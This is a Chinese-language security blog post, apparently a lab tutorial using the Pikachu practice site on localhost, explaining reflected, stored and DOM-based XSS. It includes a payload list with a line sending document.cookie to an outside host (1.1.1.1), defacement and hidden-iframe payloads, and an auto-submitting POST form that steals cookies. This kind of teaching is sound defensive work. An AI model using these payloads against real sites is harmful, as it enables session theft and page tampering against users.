<!DOCTYPE html>












  


<html class="theme-next mist use-motion" lang="zh-CN">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">












  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=7.2.0">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=7.2.0">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=7.2.0">


  <link rel="mask-icon" href="/images/logo.svg?v=7.2.0" color="#222">






<link rel="stylesheet" href="/css/main.css?v=7.2.0">






<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css?v=4.7.0">


  
  
  <link rel="stylesheet" href="/lib/needsharebutton/needsharebutton.css">







<script id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '7.2.0',
    sidebar: {"position":"left","display":"post","offset":12,"onmobile":false},
    back2top: {"enable":true,"sidebar":false,"scrollpercent":false},
    copycode: {"enable":false,"show_result":false,"style":null},
    fancybox: false,
    mediumzoom: false,
    lazyload: false,
    pangu: false,
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    },
    localsearch: {"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},
    search: {
      root: '/',
      path: 'search.xml'
    },
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    translation: {
      copy_button: '复制',
      copy_success: '复制成功',
      copy_failure: '复制失败'
    }
  };
</script>

  <meta name="description" content="漏洞简述跨站脚本攻击（XSS），是目前最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中，当正常用户访问该页面时，则可导致嵌入的恶意脚本代码的执行，从而达到恶意攻击用户的目的。 漏洞攻击流程 发现XSS漏洞 根据XSS漏洞类型，设定恶意代码注入至页面当中 诱导或等待用户访问该页面后将会自动执行恶意代码 根据攻击者所设定的恶意代码(如窃取用户cookie)，">
<meta property="og:type" content="article">
<meta property="og:title" content="XSS 跨站脚本攻击">
<meta property="og:url" content="http://yoursite.com/2019/08/27/XSS跨站脚本/index.html">
<meta property="og:site_name" content="OldSix-Sec">
<meta property="og:description" content="漏洞简述跨站脚本攻击（XSS），是目前最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中，当正常用户访问该页面时，则可导致嵌入的恶意脚本代码的执行，从而达到恶意攻击用户的目的。 漏洞攻击流程 发现XSS漏洞 根据XSS漏洞类型，设定恶意代码注入至页面当中 诱导或等待用户访问该页面后将会自动执行恶意代码 根据攻击者所设定的恶意代码(如窃取用户cookie)，">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="http://yoursite.com/images/XSS/1-1.png">
<meta property="og:image" content="http://yoursite.com/images/XSS/1-2.png">
<meta property="og:image" content="http://yoursite.com/images/XSS/1-3.png">
<meta property="og:image" content="http://yoursite.com/images/XSS/1-4.png">
<meta property="og:image" content="http://yoursite.com/images/XSS/1-5.png">
<meta property="og:image" content="http://yoursite.com/images/XSS/1-6.png">
<meta property="og:image" content="http://yoursite.com/images/XSS/2-1.png">
<meta property="og:image" content="http://yoursite.com/images/XSS/2-2.png">
<meta property="og:image" content="http://yoursite.com/images/XSS/2-3.png">
<meta property="og:image" content="http://yoursite.com/images/XSS/3-1.png">
<meta property="og:image" content="http://yoursite.com/images/XSS/3-2.png">
<meta property="og:image" content="http://yoursite.com/images/XSS/3-3.png">
<meta property="og:image" content="http://yoursite.com/images/XSS/3-4.png">
<meta property="og:image" content="http://yoursite.com/images/XSS/3-5.png">
<meta property="og:updated_time" content="2019-08-29T02:33:51.433Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="XSS 跨站脚本攻击">
<meta name="twitter:description" content="漏洞简述跨站脚本攻击（XSS），是目前最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中，当正常用户访问该页面时，则可导致嵌入的恶意脚本代码的执行，从而达到恶意攻击用户的目的。 漏洞攻击流程 发现XSS漏洞 根据XSS漏洞类型，设定恶意代码注入至页面当中 诱导或等待用户访问该页面后将会自动执行恶意代码 根据攻击者所设定的恶意代码(如窃取用户cookie)，">
<meta name="twitter:image" content="http://yoursite.com/images/XSS/1-1.png">





  
  
  <link rel="canonical" href="http://yoursite.com/2019/08/27/XSS跨站脚本/">



<script id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  
  <title>XSS 跨站脚本攻击 | OldSix-Sec</title>
  












  <noscript>
  <style>
  .use-motion .motion-element,
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-title { opacity: initial; }

  .use-motion .logo,
  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-CN">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">OldSix-Sec</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="切换导航栏">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">

    
    
      
    

    

    <a href="/" rel="section"><i class="menu-item-icon fa fa-fw fa-home"></i> <br>首页</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">

    
    
      
    

    

    <a href="/tags/" rel="section"><i class="menu-item-icon fa fa-fw fa-tags"></i> <br>标签</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-categories">

    
    
      
    

    

    <a href="/categories/" rel="section"><i class="menu-item-icon fa fa-fw fa-th"></i> <br>分类</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">

    
    
      
    

    

    <a href="/archives/" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>归档</a>

  </li>

      
      
        <li class="menu-item menu-item-search">
          <a href="javascript:;" class="popup-trigger">
          
            <i class="menu-item-icon fa fa-search fa-fw"></i> <br>搜索</a>
        </li>
      
    </ul>
  

  
    

  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
      

  
  
  

  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/08/27/XSS跨站脚本/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Shu Shen">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/timg.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="OldSix-Sec">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">XSS 跨站脚本攻击

              
            
          </h1>
        

        <div class="post-meta">

          
          
          

          
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              

              
                
              

              <time title="创建时间：2019-08-27 10:08:16" itemprop="dateCreated datePublished" datetime="2019-08-27T10:08:16+08:00">2019-08-27</time>
            </span>
          

          
            

            
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                
                  <span class="post-meta-item-text">更新于</span>
                
                <time title="修改时间：2019-08-29 10:33:51" itemprop="dateModified" datetime="2019-08-29T10:33:51+08:00">2019-08-29</time>
              </span>
            
          

          
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing"><a href="/categories/WEB安全/" itemprop="url" rel="index"><span itemprop="name">WEB安全</span></a></span>

                
                
                  ，
                
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing"><a href="/categories/WEB安全/PHP/" itemprop="url" rel="index"><span itemprop="name">PHP</span></a></span>

                
                
                  ，
                
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing"><a href="/categories/WEB安全/PHP/XSS/" itemprop="url" rel="index"><span itemprop="name">XSS</span></a></span>

                
                
              
            </span>
          

          
          

          

          

          <br>
          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="漏洞简述"><a href="#漏洞简述" class="headerlink" title="漏洞简述"></a>漏洞简述</h2><p>跨站脚本攻击（XSS），是目前最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中，当正常用户访问该页面时，则可导致嵌入的恶意脚本代码的执行，从而达到恶意攻击用户的目的。</p>
<h2 id="漏洞攻击流程"><a href="#漏洞攻击流程" class="headerlink" title="漏洞攻击流程"></a>漏洞攻击流程</h2><ol>
<li>发现XSS漏洞</li>
<li>根据XSS漏洞类型，设定恶意代码注入至页面当中</li>
<li>诱导或等待用户访问该页面后将会自动执行恶意代码</li>
<li>根据攻击者所设定的恶意代码(如窃取用户cookie)，来进行后续攻击</li>
</ol>
<p><img src="/images/XSS/1-1.png" alt></p>
<h2 id="XSS-漏洞类型"><a href="#XSS-漏洞类型" class="headerlink" title="XSS 漏洞类型"></a>XSS 漏洞类型</h2><ul>
<li>反射型（非持久性）<br>  交互的数据一般不会被存在数据库里面，一次性，所见即所得，通常出现在查询类页面中</li>
<li>存储型（持久性）<br>  交互的数据会被存在数据库里面，永久性存储，通常出现在留言板，注册等页面</li>
<li>DOM 型<br>  不与后台服务器产生数据交互，是一种DOM操作前段代码输出的产生的问题，一次性也属于反射型</li>
</ul>
<h2 id="反射型-XSS"><a href="#反射型-XSS" class="headerlink" title="反射型 XSS"></a>反射型 XSS</h2><h3 id="反射型xss-GET-实验示例"><a href="#反射型xss-GET-实验示例" class="headerlink" title="反射型xss(GET)实验示例"></a>反射型xss(GET)实验示例</h3><p>GET请求是诱导用户点击经过攻击者定制的包含恶意攻击代码的URL以达到窃取用户cookie，钓鱼等目的</p>
<p>Poc：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">- &lt;script&gt;alert(&apos;xss&apos;)&lt;/script&gt;</span><br><span class="line">- &lt;a href=&apos;&apos; onclick=alert(&apos;xss&apos;)&gt;type&lt;/a&gt;</span><br><span class="line">- &lt;img src=http://1.1.1.1/a.ipg onerror=alert(&apos;xss&apos;)&gt;</span><br><span class="line">- &lt;script&gt;window.location=&apos;http://1.1.1.1&apos;&lt;/script&gt;</span><br><span class="line">- &lt;iframe SRC=&quot;http://1.1.1.1/victim&quot; height = &quot;0&quot; width =&quot;0&quot;&gt;&lt;/iframe&gt;</span><br><span class="line">- &lt;script&gt;new Image().src=&quot;http://1.1.1.1/c.php?output=&quot;+document.cookie;&lt;/script&gt;</span><br><span class="line">- &lt;script&gt;document.body.innerHTML=&quot;&lt;div style=visibility:visible;&gt;&lt;h1&gt;THIS WEBSITE IS UNDER ATTACK&lt;/h1&gt;&lt;/div&gt;&quot;;&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p>在浏览器表单中输入AAAAA<br><img src="/images/XSS/1-2.png" alt><br>查看源代码，用户提交的数据原封不动的返回了客户端，说明可能存在XSS 攻击漏洞<br><img src="/images/XSS/1-3.png" alt><br>注入JavaScript代码，发现表单参数输入被限制在20个字符<br><img src="/images/XSS/1-4.png" alt><br>修改前端限制字符长度的HTML代码<br><img src="/images/XSS/1-5.png" alt><br>再次注入JavaScript代码<br><code>出现弹窗内容为XSS，说明存在XSS漏洞</code><br><img src="/images/XSS/1-6.png" alt><br><code>由于该网页传参方式为GET，其实可以直接在URL中传参，前端限制无法影响URL到后端的传参</code></p>
<h3 id="反射型xss-POST-实验示例（窃取用户cookie）"><a href="#反射型xss-POST-实验示例（窃取用户cookie）" class="headerlink" title="反射型xss(POST)实验示例（窃取用户cookie）"></a>反射型xss(POST)实验示例（窃取用户cookie）</h3><p><img src="/images/XSS/2-1.png" alt></p>
<p>POST请求区别与GET请求，POST请求无法通过定制的URL让用户向服务器提交数据。所以为了达到目的，需要攻击者搭建一个网站在网页内写入一个自动向服务器提交恶意代码的POST表单，而后诱导用户在登入用户的状态下访问该网站，在用户访问该网站时代码将自动将cookie发送给攻击者。</p>
<p>POST表单代码如下：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span></span><br><span class="line">window.onload=function()&#123; 	//访问页面时，自动提交表单</span><br><span class="line">	document.getElementById("postsubmit").click(); </span><br><span class="line">&#125;<span class="tag">&lt;/<span class="name">script</span>&gt;</span>&gt;</span><br><span class="line"><span class="tag">&lt;/<span class="name">head</span>&gt;</span>&gt;</span><br><span class="line"><span class="tag">&lt;<span class="name">body</span>&gt;</span>							 	//XSS漏洞页面URL</span><br><span class="line"><span class="tag">&lt;<span class="name">form</span> <span class="attr">method</span>=<span class="string">"post"</span> <span class="attr">action</span>=<span class="string">"http://127.0.0.1/pika/vul/xss/xsspost/xss_reflected_post.php"</span>&gt;</span>			/script窃取cookie的恶意代码</span><br><span class="line">	<span class="tag">&lt;<span class="name">input</span> <span class="attr">id</span>=<span class="string">"xss_in"</span> <span class="attr">type</span>=<span class="string">"text"</span> <span class="attr">name</span>=<span class="string">"message"</span> <span class="attr">value</span>=<span class="string">"&lt;script&gt; document.location = 'http://127.0.0.1/pika/pkxss/xcookie/cookie.php?cookie=' + document.cookie; &lt;/script&gt;"</span>/&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">input</span> <span class="attr">id</span>=<span class="string">"postsubmit"</span> <span class="attr">type</span>=<span class="string">"submit"</span> <span class="attr">name</span>=<span class="string">"submit"</span> <span class="attr">value</span>=<span class="string">"submit"</span>/&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">form</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure>

<h4 id="被害用户视角模拟："><a href="#被害用户视角模拟：" class="headerlink" title="被害用户视角模拟："></a>被害用户视角模拟：</h4><p>登陆用户至漏洞页面<br><img src="/images/XSS/2-2.png" alt></p>
<p>访问恶意网站<code>http://127.0.0.1/cook.html</code><br>数据提交成功后将自动重定向至pikachu主页</p>
<p>查看XSS后台cookie资料<br><img src="/images/XSS/2-3.png" alt></p>
<h2 id="存储型-XSS"><a href="#存储型-XSS" class="headerlink" title="存储型 XSS"></a>存储型 XSS</h2><p>存储型XSS漏洞跟反射型XSS漏洞形成的原因一致，区别在于反射型XSS注入的恶意代码是一次性的，而存储型XSS会将攻击者注入的代码存放至后台，例如留言板等。</p>
<h3 id="存储型XSS实验示例"><a href="#存储型XSS实验示例" class="headerlink" title="存储型XSS实验示例"></a>存储型XSS实验示例</h3><p>访问漏洞页面留言板:<a href="http://127.0.0.1/pika/vul/xss/xss_stored.php" target="_blank" rel="noopener">http://127.0.0.1/pika/vul/xss/xss_stored.php</a><br><img src="/images/XSS/3-1.png" alt><br>注入测试代码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;alert(&apos;xss&apos;)&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p><img src="/images/XSS/3-2.png" alt></p>
<p>查看源代码:<br><img src="/images/XSS/3-3.png" alt></p>
<h2 id="DOM型-XSS"><a href="#DOM型-XSS" class="headerlink" title="DOM型 XSS"></a>DOM型 XSS</h2><p>参考链接:<a href="https://blog.csdn.net/weixin_43899561/article/details/89429726" target="_blank" rel="noopener">https://blog.csdn.net/weixin_43899561/article/details/89429726</a></p>
<p>一、什么是DOM?怎么理解DOM?<br>DOM全称是Document Object Model，也就是文档对象模型。我们可以将DOM理解为，一个与系统平台和编程语言无关的接口，程序和脚本可以通过这个接口动态地访问和修改文档内容、结构和样式。当创建好一个页面并加载到浏览器时，DOM就悄然而生，它会把网页文档转换为一个文档对象，主要功能是处理网页内容。故可以使用 Javascript 语言来操作DOM以达到网页的目的。</p>
<p>首先DOM型XSS其实是一种特殊类型的反射型XSS，它是基于DOM文档对象模型的一种漏洞。<br>在网站页面中有许多页面的元素，当页面到达浏览器时浏览器会为页面创建一个顶级的Document<br>object文档对象，接着生成各个子文档对象，每个页面元素对应一个文档对象，每个文档对象包含属性、方法和事件。可以通过JS脚本对文档对象进行编辑从而修改页面的元素。也就是说，客户端的脚本程序可以通过DOM来动态修改页面内容，从客户端获取DOM中的数据并在本地执行。基于这个特性，就可以利用JS脚本来实现XSS漏洞的利用</p>
<h3 id="DOM型-XSS-实验示例1"><a href="#DOM型-XSS-实验示例1" class="headerlink" title="DOM型 XSS 实验示例1:"></a>DOM型 XSS 实验示例1:</h3><p>页面源代码:</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">div</span> <span class="attr">id</span>=<span class="string">"xssd_main"</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">script</span>&gt;</span></span><br><span class="line">        function domxss()&#123;</span><br><span class="line">            var str = document.getElementById("text").value;</span><br><span class="line"><span class="xml">            document.getElementById("dom").innerHTML = "<span class="tag">&lt;<span class="name">a</span> <span class="attr">href</span>=<span class="string">'"+str+"'</span>&gt;</span>what do you see?<span class="tag">&lt;/<span class="name">a</span>&gt;</span>";</span></span><br><span class="line">        &#125;</span><br><span class="line"><span class="xml">        //试试：'&gt;<span class="tag">&lt;<span class="name">img</span> <span class="attr">src</span>=<span class="string">"#"</span> <span class="attr">onmouseover</span>=<span class="string">"alert('xss')"</span>&gt;</span></span></span><br><span class="line">        //试试：' onclick="alert('xss')"&gt;,闭合掉就行</span><br><span class="line">    <span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line">    <span class="comment">&lt;!--&lt;a href="" onclick=('xss')&gt;--&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">input</span> <span class="attr">id</span>=<span class="string">"text"</span> <span class="attr">name</span>=<span class="string">"text"</span> <span class="attr">type</span>=<span class="string">"text"</span>  <span class="attr">value</span>=<span class="string">""</span> /&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">input</span> <span class="attr">id</span>=<span class="string">"button"</span> <span class="attr">type</span>=<span class="string">"button"</span> <span class="attr">value</span>=<span class="string">"click me!"</span> <span class="attr">onclick</span>=<span class="string">"domxss()"</span> /&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">div</span> <span class="attr">id</span>=<span class="string">"dom"</span>&gt;</span><span class="tag">&lt;/<span class="name">div</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">div</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>漏洞位于<br><code>&lt;a href=&#39;&quot;+str+&quot;&#39;&gt;what do you see?&lt;/a&gt;</code><br>其中<code>str</code>是攻击者可控制的<br>需要闭合a标签的href，加一个单引号闭合，最后再加上我们弹窗指令和闭合符号<br><code>&quot;&lt;a href=&#39;&#39; onclick=&quot;alert(&#39;xss&#39;)&quot;&gt;what do you see?&lt;/a&gt;&quot;</code><br>Poc：<br><code>&#39; onclick=&quot;alert(&#39;xss&#39;)&quot;&gt;</code></p>
<p>注入代码<br><img src="/images/XSS/3-4.png" alt><br>点击跳转链接，弹出警告窗口<br><img src="/images/XSS/3-5.png" alt></p>

      
    </div>

    

    
      
    

    
    
    

    

    
      
    
    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/08/26/Centos7-2搭建LNMP/" rel="next" title="Centos7.2搭建LNMP">
                <i class="fa fa-chevron-left"></i> Centos7.2搭建LNMP
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/08/29/CSRF跨站请求伪造/" rel="prev" title="CSRF跨站请求伪造">
                CSRF跨站请求伪造 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>

  </div>


          </div>
          
  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-overview">

          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  
    <img class="site-author-image" itemprop="image" src="/images/timg.jpg" alt="Shu Shen">
  
  <p class="site-author-name" itemprop="name">Shu Shen</p>
  <div class="site-description motion-element" itemprop="description"></div>
</div>


  <nav class="site-state motion-element">
    
      <div class="site-state-item site-state-posts">
        
          <a href="/archives/">
        
          <span class="site-state-item-count">18</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
    

    
      
      
      <div class="site-state-item site-state-categories">
        
          
            <a href="/categories/">
          
        
        
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
        <span class="site-state-item-count">11</span>
        <span class="site-state-item-name">分类</span>
        </a>
      </div>
    

    
      
      
      <div class="site-state-item site-state-tags">
        
          
            <a href="/tags/">
          
        
        
        
          
        
          
        
          
        
          
        
          
        
        <span class="site-state-item-count">5</span>
        <span class="site-state-item-name">标签</span>
        </a>
      </div>
    
  </nav>













          
          
        </div>
      </div>

      
      <!--noindex-->
        <div class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
            
            
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞简述"><span class="nav-number">1.</span> <span class="nav-text">漏洞简述</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞攻击流程"><span class="nav-number">2.</span> <span class="nav-text">漏洞攻击流程</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#XSS-漏洞类型"><span class="nav-number">3.</span> <span class="nav-text">XSS 漏洞类型</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#反射型-XSS"><span class="nav-number">4.</span> <span class="nav-text">反射型 XSS</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#反射型xss-GET-实验示例"><span class="nav-number">4.1.</span> <span class="nav-text">反射型xss(GET)实验示例</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#反射型xss-POST-实验示例（窃取用户cookie）"><span class="nav-number">4.2.</span> <span class="nav-text">反射型xss(POST)实验示例（窃取用户cookie）</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#被害用户视角模拟："><span class="nav-number">4.2.1.</span> <span class="nav-text">被害用户视角模拟：</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#存储型-XSS"><span class="nav-number">5.</span> <span class="nav-text">存储型 XSS</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#存储型XSS实验示例"><span class="nav-number">5.1.</span> <span class="nav-text">存储型XSS实验示例</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#DOM型-XSS"><span class="nav-number">6.</span> <span class="nav-text">DOM型 XSS</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#DOM型-XSS-实验示例1"><span class="nav-number">6.1.</span> <span class="nav-text">DOM型 XSS 实验示例1:</span></a></li></ol></li></ol></div>
            

          </div>
        </div>
      <!--/noindex-->
      

      

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Shu Shen</span>

  

  
</div>


  <div class="powered-by">由 <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> 强力驱动 v3.9.0</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 – <a href="https://theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Mist</a> v7.2.0</div>




        








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    
      <div id="needsharebutton-float">
        <span class="btn">
          <i class="fa fa-share-alt" aria-hidden="true"></i>
        </span>
      </div>
    

    
  
  
  <script src="/lib/needsharebutton/needsharebutton.js"></script>
  <script>
    
    
      flOptions = {};
      
        flOptions.iconStyle = "box";
      
        flOptions.boxForm = "horizontal";
      
        flOptions.position = "middleRight";
      
        flOptions.networks = "Weibo,Wechat,Douban,QQZone,Twitter,Facebook";
      
      new needShareButton('#needsharebutton-float', flOptions);
    
  </script>


    

  </div>

  

<script>
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>
















  
  









  
  <script src="/lib/jquery/index.js?v=3.4.1"></script>

  
  <script src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>




  <script src="/js/utils.js?v=7.2.0"></script>

  <script src="/js/motion.js?v=7.2.0"></script>



  
  


  <script src="/js/schemes/muse.js?v=7.2.0"></script>




  
  <script src="/js/scrollspy.js?v=7.2.0"></script>
<script src="/js/post-details.js?v=7.2.0"></script>



  <script src="/js/next-boot.js?v=7.2.0"></script>

  

  

  


  













  <script src="/js/local-search.js?v=7.2.0"></script>












<script>
// GET RESPONSIVE HEIGHT PASSED FROM IFRAME

window.addEventListener("message", function(e) {
  var data = e.data;
  if ((typeof data === 'string') && (data.indexOf('ciu_embed') > -1)) {
    var featureID = data.split(':')[1];
    var height = data.split(':')[2];
    $(`iframe[data-feature=${featureID}]`).height(parseInt(height) + 30);
  }
}, false);
</script>








  

</body>
</html>
